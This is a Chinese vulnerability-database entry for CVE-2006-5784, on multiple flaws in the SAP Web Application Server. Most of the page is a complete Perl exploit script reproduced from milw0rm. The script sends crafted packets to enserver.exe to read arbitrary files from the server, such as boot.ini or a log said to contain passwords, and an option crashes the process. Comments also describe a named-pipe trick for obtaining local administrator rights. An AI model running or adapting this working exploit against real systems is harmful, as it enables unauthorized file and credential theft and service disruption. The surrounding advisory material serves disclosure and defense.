SAP Web应用服务器多个安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112191 漏洞类型 设计错误
发布时间 2007-02-08 更新时间 2007-02-08
CVE编号 CVE-2006-5784 CNNVD-ID CNNVD-200611-114
漏洞平台 Windows CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/3291
https://www.securityfocus.com/bid/20877
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-114
|漏洞详情
SAPWeb应用服务器可给企业用户带来更高的互操作性和灵活性,为产品增加额外的Web服务。SAPWeb应用服务器的监控功能中存在以下漏洞:1)远程攻击者可能以运行SAPWeb应用服务器用户的权限读取文件。在Windows平台下,服务默认是以SAPServiceJ2E帐号运行的。这个帐号是本地管理员组的成员。2)远程攻击者可以向UDP/64999端口发送\x72\xfe导致enserver.exe进程崩溃。3)本地用户可以利用文件泄漏漏洞通过命名管道访问用户所控制的进程,并扮演为用户SAPServiceJ2E。
|漏洞EXP
#!/usr/bin/perl -w

##
## SAP 'enserver.exe' file downloader
## Tested on "SAP Web Application Server Java 6.40" (eval DVD)
## Found & coded by Nicob
##
## The downloaded file is limited to the first 32 kilobytes
## Usual port : TCP/3200+SYSNR
## Exemple : ./r3-stealer-1.0.pl 192.168.2.22 3201 "c:\\boot.ini"
##
## From MSDN (Win2K pre-SP4, WinXP pre-SP2 and WinNT) :
## "\\\\your_box\\pipe\\your_pipe" => get Local Admin (SAPServiceJ2E)
## http://msdn.microsoft.com/library/default.asp?url=/library/en-us/secauthz/security/authorization_constants.asp
##
## File parameter :
##	C:\boot.ini
## 	\\10.11.12.13\share\image.jpg
##	..\..\..\..\..\..\Documents and Settings\All Users\Application Data\sapdb\wa\httpreq.log (contains passwords !)
##

# Init

use strict;
use IO::Socket;

my $verbose = 0;
# Set this to anything not null to crash the process
my $crash = "";

my $socket;
my $reply;

$|=1;

# Get arguments

if (($#ARGV<2) or ($ARGV[0] eq "-h")) {die "Usage: $0 <ip> <port> <remote filename> (<local filename>)\n";}
my $host=$ARGV[0]; 
my $port=$ARGV[1]; 
my $filename=$ARGV[2]; 
my $output=$ARGV[3]; 

# Calculate variables

my $lg = length($filename);
my $tag1 = sprintf('%x', 0x4F + $lg);
my $tag2 = sprintf('%x', 0x20 + $lg);

# Show banner

print "#####################################################################\n";
print "### SAP 'enserver.exe' file downloader\n";
print "### Downloading '$filename' from '$host'\n";
print "#####################################################################\n\n";

# Define the packets

my $packet1 =
	"0000005dabcde123000000000000005d0000005d06010000000000060000000000040000000000010004000000000003".	# Static
	"5f6e69636f625f6e69636f625f6e69636f62315f".								# ASCII string : "_nicob_nicob_nicob1_" 
	"00000000020000003b0000000500000002000000060000000400000001";						# Static

my $packet2 =
	"000000". $tag1. "abcde12300000001000000". $tag1 ."000000". $tag1 .
	"03000000454e430001010000234541410100000013030000000000234541450001000000". $tag2 .
	"0000000000007d00000000000000000000000000". unpack("H*",$filename) . $crash ."000023454144";		# Crash if bad filename length

# Create the socket

$socket = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$host,PeerPort => $port)
		|| die "Connection refused at [$host:$port]";

# Send the two packet

print $socket pack("H*",$packet1);
print $socket pack("H*",$packet2);

sleep 2;

# Read and display response

recv($socket,$reply,150000,MSG_PEEK);
if ($reply =~ /^(.*)#EAD(.*)$/s) {
	print "File received !\n";
	if ((!defined($output)) or ($output eq "")) {
		print "\n===========================================\n";
		print $2;
		print "\n===========================================\n";
	} else {
		open(OUT, "> $output") || die "Can't open $output ($0)";
		print "File saved as '$output'\n";
		print OUT $2;
		close(OUT);
	}
} else {
	print "Problem interpreting reply :-(\n";
}

# Close the socket

print "\nThe end ...\n";
close $socket;

# milw0rm.com [2007-02-08]
|受影响的产品
SAP Web Application Server 7.0 SAP Web Application Server 6.40
|参考资料

来源:VUPEN
名称:ADV-2006-4318
链接:http://www.frsirt.com/english/advisories/2006/4318
来源:SECUNIA
名称:22677
链接:http://secunia.com/advisories/22677
来源:XF
名称:sap-pipe-privilege-escalation(29982)
链接:http://xforce.iss.net/xforce/xfdb/29982
来源:SECTRACK
名称:1017628
链接:http://www.securitytracker.com/id?1017628
来源:BID
名称:20877
链接:http://www.securityfocus.com/bid/20877
来源:BUGTRAQ
名称:20070208MultiplevulnerabilitiesinSAPWebAS6.40and7.00(technicaldetails)
链接:http://www.securityfocus.com/archive/1/archive/1/459499/100/0/threaded
来源:BUGTRAQ
名称:20061102MultiplevulnerabilitiesinSAPWebApplicationServer6.40and7.00
链接:http://www.securityfocus.com/archive/1/archive/1/450394/100/0/threaded
来源:MILW0RM
名称:3291
链接:http://milw0rm.com/exploits/3291
来源:SREASON
名称:1828
链接:http://securityreason.com/securityalert/1828